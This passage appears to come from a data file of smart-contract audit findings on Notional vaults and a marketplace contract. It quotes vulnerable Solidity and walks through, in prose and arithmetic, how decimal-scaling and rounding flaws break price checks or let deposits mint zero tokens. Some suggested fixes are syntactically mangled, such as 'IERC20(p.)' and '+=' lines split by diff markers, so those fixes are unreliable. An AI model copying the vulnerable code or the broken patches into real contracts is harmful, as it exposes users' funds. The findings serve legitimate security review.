amount needed does not exceed the slippage parameter\\n if (expected < s) {\\n revert Exception(16, expected, s, address(0), address(0));\\n }\\n\\n // Transfer the principal tokens to the pool\\n Safe.transferFrom(\\n IERC20(address(pool.fyToken())),\\n msg.sender,\\n address(pool),\\n a\\n );\\n```\\n\\nIn the test file, `vm.startPrank(address(token))` is used and approves the MarketPlace, which cannot be done in the mainnet\\n```\\n vm.startPrank(address(token));\\n IERC20(Contracts.USDC).approve(address(marketplace), type(uint256).max);\\n IERC20(Contracts.YIELD_TOKEN).approve(\\n address(marketplace),\\n type(uint256).max\\n );\\n```\\nчApprove MarketPlace to spend tokens in ERC5095 in ERC5095.setPool.\\n```\\n function setPool(address p)\\n external\\n authorized(marketplace)\\n returns (bool)\\n {\\n pool = p.fyToken();\\n// Add the line below\\n Safe.approve(IERC20(underlying), marketplace, type(uint256).max);\\n// Add the line below\\n Safe.approve(IERC20(p.), marketplace, type(uint256).max);\\n\\n return true;\\n }\\n\\n pool = address(0);\\n }\\n```\\nчIt makes functions such as ERC5095.deposit/mint/withdraw/redeem functions fail, i.e. users cannot sell tokens through ERC5095.ч```\\n function sellUnderlying(\\n address u,\\n uint256 m,\\n uint128 a,\\n uint128 s\\n ) external returns (uint128) {\\n // Get the pool for the market\\n IPool pool = IPool(pools[u][m]);\\n\\n // Get the number of PTs received for selling `a` underlying tokens\\n uint128 expected = pool.sellBasePreview(a);\\n\\n // Verify slippage does not exceed the one set by the user\\n if (expected < s) {\\n revert Exception(16, expected, 0, address(0), address(0));\\n }\\n\\n // Transfer the underlying tokens to the pool\\n Safe.transferFrom(IERC20(pool.base()), msg.sender, address(pool), a);\\n// rest of code\\n function sellPrincipalToken(\\n address u,\\n uint256 m,\\n uint128 a,\\n uint128 s\\n ) external returns (uint128) {\\n // Get the pool for the market\\n IPool pool = IPool(pools[u][m]);\\n\\n // Preview amount of underlying received by selling `a` PTs\\n uint256 expected = pool.sellFYTokenPreview(a);\\n\\n // Verify that the amount needed does not exceed the slippage parameter\\n if (expected < s) {\\n revert Exception(16, expected, s, address(0), address(0));\\n }\\n\\n // Transfer the principal tokens to the pool\\n Safe.transferFrom(\\n IERC20(address(pool.fyToken())),\\n msg.sender,\\n address(pool),\\n a\\n );\\n```\\n -Two token vault will be broken if it comprises tokens with different decimalsчhighчA two token vault that comprises tokens with different decimals will have many of its key functions broken. For instance, rewards cannot be reinvested and vault cannot be settled.\\nThe `Stable2TokenOracleMath._getSpotPrice` function is used to compute the spot price of two tokens.\\n```\\nFile: Stable2TokenOracleMath.sol\\nlibrary Stable2TokenOracleMath {\\n using TypeConvert for int256;\\n using Stable2TokenOracleMath for StableOracleContext;\\n\\n function _getSpotPrice(\\n StableOracleContext memory oracleContext, \\n TwoTokenPoolContext memory poolContext, \\n uint256 primaryBalance,\\n uint256 secondaryBalance,\\n uint256 tokenIndex\\n ) internal view returns (uint256 spotPrice) {\\n require(tokenIndex < 2); /// @dev invalid token index\\n\\n /// Apply scale factors\\n uint256 scaledPrimaryBalance = primaryBalance * poolContext.primaryScaleFactor \\n / BalancerConstants.BALANCER_PRECISION;\\n uint256 scaledSecondaryBalance = secondaryBalance * poolContext.secondaryScaleFactor \\n / BalancerConstants.BALANCER_PRECISION;\\n\\n /// @notice poolContext balances are always in BALANCER_PRECISION (1e18)\\n (uint256 balanceX, uint256 balanceY) = tokenIndex == 0 ?\\n (scaledPrimaryBalance, scaledSecondaryBalance) :\\n (scaledSecondaryBalance, scaledPrimaryBalance);\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n oracleContext.ampParam, StableMath._balances(balanceX, balanceY), true // round up\\n );\\n\\n spotPrice = StableMath._calcSpotPrice({\\n amplificationParameter: oracleContext.ampParam,\\n invariant: invariant,\\n balanceX: balanceX, \\n balanceY: balanceY\\n });\\n\\n /// Apply secondary scale factor in reverse\\n uint256 scaleFactor = tokenIndex == 0 ?\\n poolContext.secondaryScaleFactor * BalancerConstants.BALANCER_PRECISION / poolContext.primaryScaleFactor :\\n poolContext.primaryScaleFactor * BalancerConstants.BALANCER_PRECISION / poolContext.secondaryScaleFactor;\\n spotPrice = spotPrice * BalancerConstants.BALANCER_PRECISION / scaleFactor;\\n }\\n```\\n\\nTwo tokens (USDC and DAI) with different decimals will be used below to illustrate the issue:\\nUSDC/DAI Spot Price\\nAssume that the primary token is DAI (18 decimals) and the secondary token is USDC (6 decimals). As such, the scaling factors would be as follows. The token rate is ignored and set to 1 for simplicity.\\nPrimary Token (DAI)'s scaling factor = 1e18\\n`scaling factor = FixedPoint.ONE (1e18) * decimals difference to reach 18 decimals (1e0) * token rate (1)\\nscaling factor = 1e18`\\nSecondary Token (USDC)'s scaling factor = 1e30\\n`scaling factor = FixedPoint.ONE (1e18) * decimals difference to reach 18 decimals (1e12) * token rate (1)\\nscaling factor = 1e18 * 1e12 = 1e30`\\nAssume that the `primaryBalance` is 100 DAI (100e18), and the `secondaryBalance` is 100 USDC (100e6). Line 25 - 28 of the `_getSpotPrice` function will normalize the tokens balances to 18 decimals as follows:\\n`scaledPrimaryBalance` will be 100e18 (It remains the same as no scaling is needed because DAI is already denominated in 18 decimals)\\n`scaledPrimaryBalance = primaryBalance * poolContext.primaryScaleFactor / BalancerConstants.BALANCER_PRECISION;\\n`scaledPrimaryBalance` = 100e18 * 1e18 / 1e18\\n`scaledPrimaryBalance` = 100e18`\\n`scaledSecondaryBalance` will upscale to 100e18\\n`scaledSecondaryBalance` = `scaledSecondaryBalance` * poolContext.primaryScaleFactor / BalancerConstants.BALANCER_PRECISION;\\n`scaledSecondaryBalance` = 100e6 * 1e30 / 1e18\\n`scaledSecondaryBalance` = 100e18\\nThe `StableMath._calcSpotPrice` function at Line 39 returns the spot price of Y/X. In this example, `balanceX` is DAI, and `balanceY` is USDC. Thus, the spot price will be USDC/DAI. This means the amount of USDC I will get for each DAI.\\nWithin Balancer, all stable math calculations within the Balancer's pools are performed in `1e18`. With both the primary and secondary balances normalized to 18 decimals, they can be safely passed to the `StableMath._calculateInvariant` and `StableMath._calcSpotPrice` functions to compute the spot price. Assuming that the price of USDC and DAI is perfectly symmetric (1 DAI can be exchanged for exactly 1 USDC, and vice versa), the spot price returned from the `StableMath._calcSpotPrice` will be `1e18`. Note that the spot price returned by the `StableMath._calcSpotPrice` function will be denominated in 18 decimals.\\nIn Line 47-50 within the `Stable2TokenOracleMath._getSpotPrice` function, it attempts to downscale the spot price to normalize it back to the original decimals and token rate (e.g. stETH back to wstETH) of the token.\\nThe `scaleFactor` at Line 47 will be evaluated as follows:\\n```\\nscaleFactor = poolContext.secondaryScaleFactor * BalancerConstants.BALANCER_PRECISION / poolContext.primaryScaleFactor\\nscaleFactor = 1e30 * 1e18 / 1e18\\nscaleFactor = 1e30\\n```\\n\\nFinally, the spot price will be scaled in reverse order and it will be evaluated to `1e6` as shown below:\\n```\\nspotPrice = spotPrice * BalancerConstants.BALANCER_PRECISION / scaleFactor;\\nspotPrice = 1e18 * 1e18 / 1e30\\nspotPrice = 1e6\\n```\\n\\nDAI/USDC Spot Price\\nIf it is the opposite where the primary token is USDC (6 decimals) and the secondary token is DAI (18 decimals), the calculation of the spot price will be as follows:\\nThe `scaleFactor` at Line 47 will be evaluated to as follows:\\n```\\nscaleFactor = poolContext.secondaryScaleFactor * BalancerConstants.BALANCER_PRECISION / poolContext.primaryScaleFactor\\nscaleFactor = 1e18 * 1e18 / 1e30\\nscaleFactor = 1e6\\n```\\n\\nFinally, the spot price will be scaled in reverse order and it will be evaluated to `1e30` as shown below:\\n```\\nspotPrice = spotPrice * BalancerConstants.BALANCER_PRECISION / scaleFactor;\\nspotPrice = 1e18 * 1e18 / 1e6\\nspotPrice = 1e30\\n```\\n\\nNote about the spot price\\nAssuming that the spot price of USDC and DAI is 1:1. As shown above, if the decimals of two tokens are not the same, the final spot price will end up either 1e6 (USDC/DAI) or 1e30 (DAI/USDC). However, if the decimals of two tokens (e.g. wstETH and WETH) are the same, this issue stays hidden as the `scaleFactor` in Line 47 will always be 1e18 as both `secondaryScaleFactor` and `primaryScaleFactor` cancel out each other.\\nIt was observed that the spot price returned from the `Stable2TokenOracleMath._getSpotPrice` function is being compared with the oracle price from the `TwoTokenPoolUtils._getOraclePairPrice` function to determine if the pool has been manipulated within many functions.\\n```\\nuint256 oraclePrice = poolContext._getOraclePairPrice(strategyContext.tradingModule);\\n```\\n\\nBased on the implementation of the `TwoTokenPoolUtils._getOraclePairPrice` function , the `oraclePrice` returned by this function is always denominated in 18 decimals regardless of the decimals of the underlying tokens. For instance, assume the spot price of USDC (6 decimals) and DAI (18 decimals) is 1:1. The spot price returned by this oracle function for USDC/DAI will be `1e18` and DAI/USDC will be `1e18`.\\nIn many functions, the spot price returned from the `Stable2TokenOracleMath._getSpotPrice` function is compared with the oracle price via the `Stable2TokenOracleMath._checkPriceLimit`. Following is one such example. The `oraclePrice` will be `1e18`, while the `spotPrice` will be either `1e6` or `1e30` in our example. This will cause the `_checkPriceLimit` to always revert because of the large discrepancy between the two prices.\\n```\\nFile: Stable2TokenOracleMath.sol\\n function _getMinExitAmounts(\\n StableOracleContext calldata oracleContext,\\n TwoTokenPoolContext calldata poolContext,\\n StrategyContext calldata strategyContext,\\n uint256 oraclePrice,\\n uint256 bptAmount\\n ) internal view returns (uint256 minPrimary, uint256 minSecondary) {\\n // Oracle price is always specified in terms of primary, so tokenIndex == 0 for primary\\n // Validate the spot price to make sure the pool is not being manipulated\\n uint256 spotPrice = _getSpotPrice({\\n oracleContext: oracleContext,\\n poolContext: poolContext,\\n primaryBalance: poolContext.primaryBalance,\\n secondaryBalance: poolContext.secondaryBalance,\\n tokenIndex: 0\\n });\\n _checkPriceLimit(strategyContext, oraclePrice, spotPrice);\\n```\\n\\nOther affected functions include the following:\\nStable2TokenOracleMath._validateSpotPriceAndPairPrice\\nStable2TokenOracleMath._getTimeWeightedPrimaryBalanceчIssue Two token vault will be broken if it comprises tokens with different decimals\\nWithin the `Stable2TokenOracleMath._getSpotPrice`, normalize the spot price back to 1e18 before returning the result. This ensures that it can be compared with the oracle price, which is denominated in 1e18 precision.\\nThis has been implemented in the spot price function (Boosted3TokenPoolUtils._getSpotPriceWithInvariant) of another pool (Boosted3Token). However, it was not consistently applied in `TwoTokenPool`.чA vault supporting tokens with two different decimals will have many of its key functions will be broken as the `_checkPriceLimit` will always revert. For instance, rewards cannot be reinvested and vaults cannot be settled since they rely on the `_checkPriceLimit` function.\\nIf the reward cannot be reinvested, the strategy tokens held by the users will not appreciate. If the vault cannot be settled, the vault debt cannot be repaid to Notional and the gain cannot be realized. Loss of assets for both users and Notionalч```\\nFile: Stable2TokenOracleMath.sol\\nlibrary Stable2TokenOracleMath {\\n using TypeConvert for int256;\\n using Stable2TokenOracleMath for StableOracleContext;\\n\\n function _getSpotPrice(\\n StableOracleContext memory oracleContext, \\n TwoTokenPoolContext memory poolContext, \\n uint256 primaryBalance,\\n uint256 secondaryBalance,\\n uint256 tokenIndex\\n ) internal view returns (uint256 spotPrice) {\\n require(tokenIndex < 2); /// @dev invalid token index\\n\\n /// Apply scale factors\\n uint256 scaledPrimaryBalance = primaryBalance * poolContext.primaryScaleFactor \\n / BalancerConstants.BALANCER_PRECISION;\\n uint256 scaledSecondaryBalance = secondaryBalance * poolContext.secondaryScaleFactor \\n / BalancerConstants.BALANCER_PRECISION;\\n\\n /// @notice poolContext balances are always in BALANCER_PRECISION (1e18)\\n (uint256 balanceX, uint256 balanceY) = tokenIndex == 0 ?\\n (scaledPrimaryBalance, scaledSecondaryBalance) :\\n (scaledSecondaryBalance, scaledPrimaryBalance);\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n oracleContext.ampParam, StableMath._balances(balanceX, balanceY), true // round up\\n );\\n\\n spotPrice = StableMath._calcSpotPrice({\\n amplificationParameter: oracleContext.ampParam,\\n invariant: invariant,\\n balanceX: balanceX, \\n balanceY: balanceY\\n });\\n\\n /// Apply secondary scale factor in reverse\\n uint256 scaleFactor = tokenIndex == 0 ?\\n poolContext.secondaryScaleFactor * BalancerConstants.BALANCER_PRECISION / poolContext.primaryScaleFactor :\\n poolContext.primaryScaleFactor * BalancerConstants.BALANCER_PRECISION / poolContext.secondaryScaleFactor;\\n spotPrice = spotPrice * BalancerConstants.BALANCER_PRECISION / scaleFactor;\\n }\\n```\\n -Rounding differences when computing the invariantчhighчThe invariant used within Boosted3Token vault to compute the spot price is not aligned with the Balancer's ComposableBoostedPool due to rounding differences. The spot price is used to verify if the pool has been manipulated before executing certain key vault actions (e.g. settle vault, reinvest rewards). In the worst-case scenario, it might potentially fail to detect the pool has been manipulated as the spot price computed might be inaccurate.\\nThe Boosted3Token leverage vault relies on the old version of the `StableMath._calculateInvariant` that allows the caller to specify if the computation should round up or down via the `roundUp` parameter.\\n```\\nFile: StableMath.sol\\n function _calculateInvariant(\\n uint256 amplificationParameter,\\n uint256[] memory balances,\\n bool roundUp\\n ) internal pure returns (uint256) {\\n /**********************************************************************************************\\n // invariant //\\n // D = invariant D^(n+1) //\\n // A = amplification coefficient A n^n S + D = A D n^n + ----------- //\\n // S = sum of balances n^n P //\\n // P = product of balances //\\n // n = number of tokens //\\n *********x************************************************************************************/\\n\\n unchecked {\\n // We support rounding up or down.\\n uint256 sum = 0;\\n uint256 numTokens = balances.length;\\n for (uint256 i = 0; i < numTokens; i++) {\\n sum = sum.add(balances[i]);\\n }\\n if (sum == 0) {\\n return 0;\\n }\\n\\n uint256 prevInvariant = 0;\\n uint256 invariant = sum;\\n uint256 ampTimesTotal = amplificationParameter * numTokens;\\n\\n for (uint256 i = 0; i < 255; i++) {\\n uint256 P_D = balances[0] * numTokens;\\n for (uint256 j = 1; j < numTokens; j++) {\\n P_D = Math.div(Math.mul(Math.mul(P_D, balances[j]), numTokens), invariant, roundUp);\\n }\\n prevInvariant = invariant;\\n invariant = Math.div(\\n Math.mul(Math.mul(numTokens, invariant), invariant).add(\\n Math.div(Math.mul(Math.mul(ampTimesTotal, sum), P_D), _AMP_PRECISION, roundUp)\\n ),\\n Math.mul(numTokens + 1, invariant).add(\\n // No need to use checked arithmetic for the amp precision, the amp is guaranteed to be at least 1\\n Math.div(Math.mul(ampTimesTotal - _AMP_PRECISION, P_D), _AMP_PRECISION, !roundUp)\\n ),\\n roundUp\\n );\\n\\n if (invariant > prevInvariant) {\\n if (invariant - prevInvariant <= 1) {\\n return invariant;\\n }\\n } else if (prevInvariant - invariant <= 1) {\\n return invariant;\\n }\\n }\\n }\\n\\n revert CalculationDidNotConverge();\\n }\\n```\\n\\nWithin the `Boosted3TokenPoolUtils._getSpotPrice` and `Boosted3TokenPoolUtils._getValidatedPoolData` functions, the `StableMath._calculateInvariant` is computed rounding up.\\n```\\nFile: Boosted3TokenPoolUtils.sol\\n function _getSpotPrice(\\n ThreeTokenPoolContext memory poolContext, \\n BoostedOracleContext memory oracleContext,\\n uint8 tokenIndex\\n ) internal pure returns (uint256 spotPrice) {\\n..SNIP..\\n uint256[] memory balances = _getScaledBalances(poolContext);\\n uint256 invariant = StableMath._calculateInvariant(\\n oracleContext.ampParam, balances, true // roundUp = true\\n );\\n```\\n\\n```\\nFile: Boosted3TokenPoolUtils.sol\\n function _getValidatedPoolData(\\n ThreeTokenPoolContext memory poolContext,\\n BoostedOracleContext memory oracleContext,\\n StrategyContext memory strategyContext\\n ) internal view returns (uint256 virtualSupply, uint256[] memory balances, uint256 invariant) {\\n (virtualSupply, balances) =\\n _getVirtualSupplyAndBalances(poolContext, oracleContext);\\n\\n // Get the current and new invariants. Since we need a bigger new invariant, we round the current one up.\\n invariant = StableMath._calculateInvariant(\\n oracleContext.ampParam, balances, true // roundUp = true\\n );\\n```\\n\\nHowever, Balancer has since migrated its Boosted3Token pool from the legacy BoostedPool structure to a new ComposableBoostedPool contract.\\nThe new ComposableBoostedPool contract uses a newer version of the StableMath library where the `StableMath._calculateInvariant` function always rounds down.\\n```\\n function _calculateInvariant(uint256 amplificationParameter, uint256[] memory balances)\\n internal\\n pure\\n returns (uint256)\\n {\\n /**********************************************************************************************\\n // invariant //\\n // D = invariant D^(n+1) //\\n // A = amplification coefficient A n^n S + D = A D n^n + ----------- //\\n // S = sum of balances n^n P //\\n // P = product of balances //\\n // n = number of tokens //\\n **********************************************************************************************/\\n\\n // Always round down, to match Vyper's arithmetic (which always truncates).\\n\\n uint256 sum = 0; // S in the Curve version\\n uint256 numTokens = balances.length;\\n for (uint256 i = 0; i < numTokens; i++) {\\n sum = sum.add(balances[i]);\\n }\\n if (sum == 0) {\\n return 0;\\n }\\n ..SNIP..\\n```\\n\\nThus, Notional round up when calculating the invariant while Balancer's ComposableBoostedPool round down when calculating the invariant. This inconsistency will result in a different invariantчTo avoid any discrepancy in the result, ensure that the StableMath library used by Balancer's ComposableBoostedPool and Notional's Boosted3Token leverage vault are aligned, and the implementation of the StableMath functions is the same between them.чThe invariant is used to compute the spot price to verify if the pool has been manipulated before executing certain key vault actions (e.g. settle vault, reinvest rewards). If the inputted invariant is inaccurate, the spot price computed might not be accurate and might not match the actual spot price of the Balancer Pool. In the worst-case scenario, it might potentially fail to detect the pool has been manipulated and the trade proceeds to execute against the manipulated pool leading to a loss of assets.ч```\\nFile: StableMath.sol\\n function _calculateInvariant(\\n uint256 amplificationParameter,\\n uint256[] memory balances,\\n bool roundUp\\n ) internal pure returns (uint256) {\\n /**********************************************************************************************\\n // invariant //\\n // D = invariant D^(n+1) //\\n // A = amplification coefficient A n^n S + D = A D n^n + ----------- //\\n // S = sum of balances n^n P //\\n // P = product of balances //\\n // n = number of tokens //\\n *********x************************************************************************************/\\n\\n unchecked {\\n // We support rounding up or down.\\n uint256 sum = 0;\\n uint256 numTokens = balances.length;\\n for (uint256 i = 0; i < numTokens; i++) {\\n sum = sum.add(balances[i]);\\n }\\n if (sum == 0) {\\n return 0;\\n }\\n\\n uint256 prevInvariant = 0;\\n uint256 invariant = sum;\\n uint256 ampTimesTotal = amplificationParameter * numTokens;\\n\\n for (uint256 i = 0; i < 255; i++) {\\n uint256 P_D = balances[0] * numTokens;\\n for (uint256 j = 1; j < numTokens; j++) {\\n P_D = Math.div(Math.mul(Math.mul(P_D, balances[j]), numTokens), invariant, roundUp);\\n }\\n prevInvariant = invariant;\\n invariant = Math.div(\\n Math.mul(Math.mul(numTokens, invariant), invariant).add(\\n Math.div(Math.mul(Math.mul(ampTimesTotal, sum), P_D), _AMP_PRECISION, roundUp)\\n ),\\n Math.mul(numTokens + 1, invariant).add(\\n // No need to use checked arithmetic for the amp precision, the amp is guaranteed to be at least 1\\n Math.div(Math.mul(ampTimesTotal - _AMP_PRECISION, P_D), _AMP_PRECISION, !roundUp)\\n ),\\n roundUp\\n );\\n\\n if (invariant > prevInvariant) {\\n if (invariant - prevInvariant <= 1) {\\n return invariant;\\n }\\n } else if (prevInvariant - invariant <= 1) {\\n return invariant;\\n }\\n }\\n }\\n\\n revert CalculationDidNotConverge();\\n }\\n```\\n -Users deposit assets to the vault but receives no strategy token in returnчhighчDue to a rounding error in Solidity, it is possible that a user deposits assets to the vault, but receives no strategy token in return due to issues in the following functions:\\nStrategyUtils._convertBPTClaimToStrategyTokens\\nBoosted3TokenPoolUtils._deposit\\nTwoTokenPoolUtils._deposit\\nThis affects both the TwoToken and Boosted3Token vaults\\n```\\nint256 internal constant INTERNAL_TOKEN_PRECISION = 1e8;\\nuint256 internal constant BALANCER_PRECISION = 1e18;\\n```\\n\\nWithin the `StrategyUtils._convertBPTClaimToStrategyTokens` function, it was observed that the numerator precision (1e8) is much smaller than the denominator precision (1e18).\\n```\\nFile: StrategyUtils.sol\\n /// @notice Converts BPT to strategy tokens\\n function _convertBPTClaimToStrategyTokens(StrategyContext memory context, uint256 bptClaim)\\n internal pure returns (uint256 strategyTokenAmount) {\\n if (context.vaultState.totalBPTHeld == 0) {\\n // Strategy tokens are in 8 decimal precision, BPT is in 18. Scale the minted amount down.\\n return (bptClaim * uint256(Constants.INTERNAL_TOKEN_PRECISION)) / \\n BalancerConstants.BALANCER_PRECISION;\\n }\\n\\n // BPT held in maturity is calculated before the new BPT tokens are minted, so this calculation\\n // is the tokens minted that will give the account a corresponding share of the new bpt balance held.\\n // The precision here will be the same as strategy token supply.\\n strategyTokenAmount = (bptClaim * context.vaultState.totalStrategyTokenGlobal) / context.vaultState.totalBPTHeld;\\n }\\n```\\n\\nAs a result, the `StrategyUtils._convertBPTClaimToStrategyTokens` function might return zero strategy tokens under the following two conditions:\\nIf the `totalBPTHeld` is zero (First Deposit)\\nIf the `totalBPTHeld` is zero, the code at Line 31 will be executed, and the following formula is used:\\n```\\nstrategyTokenAmount = (bptClaim * uint256(Constants.INTERNAL_TOKEN_PRECISION)) / BalancerConstants.BALANCER_PRECISION;\\nstrategyTokenAmount = (bptClaim * 1e8) / 1e18\\nstrategyTokenAmount = ((10 ** 10 - 1) * 1e8) / 1e18 = 0\\n```\\n\\nDuring the first deposit, if the user deposits less than 1e10 BPT, Solidity will round down and `strategyTokenAmount` will be zero.\\nIf the `totalBPTHeld` is larger than zero (Subsequently Deposits)\\nIf the `totalBPTHeld` is larger than zero, the code at Line 38 will be executed, and the following formula is used:\\n```\\nstrategyTokenAmount = (bptClaim * context.vaultState.totalStrategyTokenGlobal) / context.vaultState.totalBPTHeld;\\nstrategyTokenAmount = (bptClaim * (x * 1e8))/ (y * 1e18)\\n```\\n\\nIf the numerator is less than the denominator, the `strategyTokenAmount` will be zero.\\nTherefore, it is possible that the users deposited their minted BPT to the vault, but received zero strategy tokens in return.\\n```\\nFile: Boosted3TokenPoolUtils.sol\\n function _deposit(\\n ThreeTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n AuraStakingContext memory stakingContext,\\n BoostedOracleContext memory oracleContext,\\n uint256 deposit,\\n uint256 minBPT\\n ) internal returns (uint256 strategyTokensMinted) {\\n uint256 bptMinted = poolContext._joinPoolAndStake({\\n strategyContext: strategyContext,\\n stakingContext: stakingContext,\\n oracleContext: oracleContext,\\n deposit: deposit,\\n minBPT: minBPT\\n });\\n\\n strategyTokensMinted = strategyContext._convertBPTClaimToStrategyTokens(bptMinted);\\n\\n strategyContext.vaultState.totalBPTHeld += bptMinted;\\n // Update global supply count\\n strategyContext.vaultState.totalStrategyTokenGlobal += strategyTokensMinted.toUint80();\\n strategyContext.vaultState.setStrategyVaultState(); \\n }\\n```\\n\\nProof-of-Concept\\nAssume that Alice is the first depositor, and she forwarded 10000 BPT. During the first mint, the strategy token will be minted in a 1:1 ratio. Therefore, Alice will receive 10000 strategy tokens in return. At this point in time, `totalStrategyTokenGlobal` = 10000 strategy tokens and `totalBPTHeld` is 10000 BPT.\\nWhen Bob deposits to the vault after Alice, he will be subjected to the following formula:\\n```\\nstrategyTokenAmount = (bptClaim * context.vaultState.totalStrategyTokenGlobal) / context.vaultState.totalBPTHeld;\\nstrategyTokenAmount = (bptClaim * (10000 * 1e8))/ (10000 * 1e18)\\nstrategyTokenAmount = (bptClaim * (1e12))/ (1e22)\\n```\\n\\nIf Bob deposits less than 1e10 BPT, Solidity will round down and `strategyTokenAmount` will be zero. Bob will receive no strategy token in return for his BPT.\\nAnother side effect of this issue is that if Alice withdraws all her strategy tokens, she will get back all her 10000 BPT plus the BPT that Bob deposited earlier.чConsider reverting if zero strategy token is minted. This check has been implemented in many well-known vault designs as this is a commonly known issue (e.g. Solmate)\\n```\\nfunction _deposit(\\n ThreeTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n AuraStakingContext memory stakingContext,\\n BoostedOracleContext memory oracleContext,\\n uint256 deposit,\\n uint256 minBPT\\n) internal returns (uint256 strategyTokensMinted) {\\n uint256 bptMinted = poolContext._joinPoolAndStake({\\n strategyContext: strategyContext,\\n stakingContext: stakingContext,\\n oracleContext: oracleContext,\\n deposit: deposit,\\n minBPT: minBPT\\n });\\n\\n strategyTokensMinted = strategyContext._convertBPTClaimToStrategyTokens(bptMinted);\\n// Add the line below\\n require(strategyTokensMinted != 0, \"zero strategy token minted\"); \\n\\n strategyContext.vaultState.totalBPTHeld // Add the line below\\n= bptMinted;\\n // Update global supply count\\n strategyContext.vaultState.totalStrategyTokenGlobal // Add the line below\\n= strategyTokensMinted.toUint80();\\n strategyContext.vaultState.setStrategyVaultState(); \\n}\\n```\\nчLoss of assets for the users as they deposited their assets but receive zero strategy tokens in return.ч```\\nint256 internal constant INTERNAL_TOKEN_PRECISION = 1e8;\\nuint256 internal constant BALANCER_PRECISION = 1e18;\\n```\\n -Vault's `totalStrategyTokenGlobal` will not be in syncчhighчThe `strategyContext.vaultState.totalStrategyTokenGlobal` variable that tracks the number of strategy tokens held in the vault will not be in sync and will cause accounting issues within the vault.\\nThis affects both the TwoToken and Boosted3Token vaults\\nThe `StrategyUtils._convertStrategyTokensToBPTClaim` function might return zero if a small number of `strategyTokenAmount` is passed into the function. If `(strategyTokenAmount * context.vaultState.totalBPTHeld)` is smaller than `context.vaultState.totalStrategyTokenGlobal`, the `bptClaim` will be zero.\\n```\\nFile: StrategyUtils.sol\\n /// @notice Converts strategy tokens to BPT\\n function _convertStrategyTokensToBPTClaim(StrategyContext memory context, uint256 strategyTokenAmount)\\n internal pure returns (uint256 bptClaim) {\\n require(strategyTokenAmount <= context.vaultState.totalStrategyTokenGlobal);\\n if (context.vaultState.totalStrategyTokenGlobal > 0) {\\n bptClaim = (strategyTokenAmount * context.vaultState.totalBPTHeld) / context.vaultState.totalStrategyTokenGlobal;\\n }\\n }\\n```\\n\\nIn Line 441 of the `Boosted3TokenPoolUtils._redeem` function below, if `bptClaim` is zero, it will return zero and exit the function immediately.\\nIf a small number of `strategyTokens` is passed into the `_redeem` function and the `bptClaim` ends up as zero, the caller of the `_redeem` function will assume that all the `strategyTokens` have been redeemed.\\n```\\nFile: Boosted3TokenPoolUtils.sol\\n function _redeem(\\n ThreeTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n AuraStakingContext memory stakingContext,\\n uint256 strategyTokens,\\n uint256 minPrimary\\n ) internal returns (uint256 finalPrimaryBalance) {\\n uint256 bptClaim = strategyContext._convertStrategyTokensToBPTClaim(strategyTokens);\\n\\n if (bptClaim == 0) return 0;\\n\\n finalPrimaryBalance = _unstakeAndExitPool({\\n stakingContext: stakingContext,\\n poolContext: poolContext,\\n bptClaim: bptClaim,\\n minPrimary: minPrimary\\n });\\n\\n strategyContext.vaultState.totalBPTHeld -= bptClaim;\\n strategyContext.vaultState.totalStrategyTokenGlobal -= strategyTokens.toUint80();\\n strategyContext.vaultState.setStrategyVaultState(); \\n }\\n```\\n\\nThe following function shows an example of the caller of the `_redeem` function at Line 171 below accepting the zero value as it does not revert when the zero value is returned by the `_redeem` function. Thus, it will consider the small number of `strategyTokens` to be redeemed. Note that the `_redeemFromNotional` function calls the `_redeem` function under the hood.\\n```\\nFile: BaseStrategyVault.sol\\n function redeemFromNotional(\\n address account,\\n address receiver,\\n uint256 strategyTokens,\\n uint256 maturity,\\n uint256 underlyingToRepayDebt,\\n bytes calldata data\\n ) external onlyNotional returns (uint256 transferToReceiver) {\\n uint256 borrowedCurrencyAmount = _redeemFromNotional(account, strategyTokens, maturity, data);\\n\\n uint256 transferToNotional;\\n if (account == address(this) || borrowedCurrencyAmount <= underlyingToRepayDebt) {\\n // It may be the case that insufficient tokens were redeemed to repay the debt. If this\\n // happens the Notional will attempt to recover the shortfall from the account directly.\\n // This can happen if an account wants to reduce their leverage by paying off debt but\\n // does not want to sell strategy tokens to do so.\\n // The other situation would be that the vault is calling redemption to deleverage or\\n // settle. In that case all tokens go back to Notional.\\n transferToNotional = borrowedCurrencyAmount;\\n } else {\\n transferToNotional = underlyingToRepayDebt;\\n unchecked { transferToReceiver = borrowedCurrencyAmount - underlyingToRepayDebt; }\\n }\\n\\n if (_UNDERLYING_IS_ETH) {\\n if (transferToReceiver > 0) payable(receiver).transfer(transferToReceiver);\\n if (transferToNotional > 0) payable(address(NOTIONAL)).transfer(transferToNotional);\\n } else {\\n if (transferToReceiver > 0) _UNDERLYING_TOKEN.checkTransfer(receiver, transferToReceiver);\\n if (transferToNotional > 0) _UNDERLYING_TOKEN.checkTransfer(address(NOTIONAL), transferToNotional);\\n }\\n }\\n```\\n\\nSubsequently, on Notional side, it will deduct the redeemed strategy tokens from itsvaultState.totalStrategyTokens state (Refer to Line 177 below)\\n```\\nFile: VaultAction.sol\\n /// @notice Redeems strategy tokens to cash\\n function _redeemStrategyTokensToCashInternal(\\n VaultConfig memory vaultConfig,\\n uint256 maturity,\\n uint256 strategyTokensToRedeem,\\n bytes calldata vaultData\\n ) private nonReentrant returns (int256 assetCashRequiredToSettle, int256 underlyingCashRequiredToSettle) {\\n // If the vault allows further re-entrancy then set the status back to the default\\n if (vaultConfig.getFlag(VaultConfiguration.ALLOW_REENTRANCY)) {\\n reentrancyStatus = _NOT_ENTERED;\\n }\\n\\n VaultState memory vaultState = VaultStateLib.getVaultState(vaultConfig.vault, maturity);\\n (int256 assetCashReceived, uint256 underlyingToReceiver) = vaultConfig.redeemWithoutDebtRepayment(\\n vaultConfig.vault, strategyTokensToRedeem, maturity, vaultData\\n );\\n require(assetCashReceived > 0);\\n // Safety check to ensure that the vault does not somehow receive tokens in this scenario\\n require(underlyingToReceiver == 0);\\n\\n vaultState.totalAssetCash = vaultState.totalAssetCash.add(uint256(assetCashReceived));\\n vaultState.totalStrategyTokens = vaultState.totalStrategyTokens.sub(strategyTokensToRedeem);\\n vaultState.setVaultState(vaultConfig.vault);\\n\\n emit VaultRedeemStrategyToken(vaultConfig.vault, maturity, assetCashReceived, strategyTokensToRedeem);\\n return _getCashRequiredToSettle(vaultConfig, vaultState, maturity);\\n }\\n```\\n\\nHowever, the main issue is that when a small number of 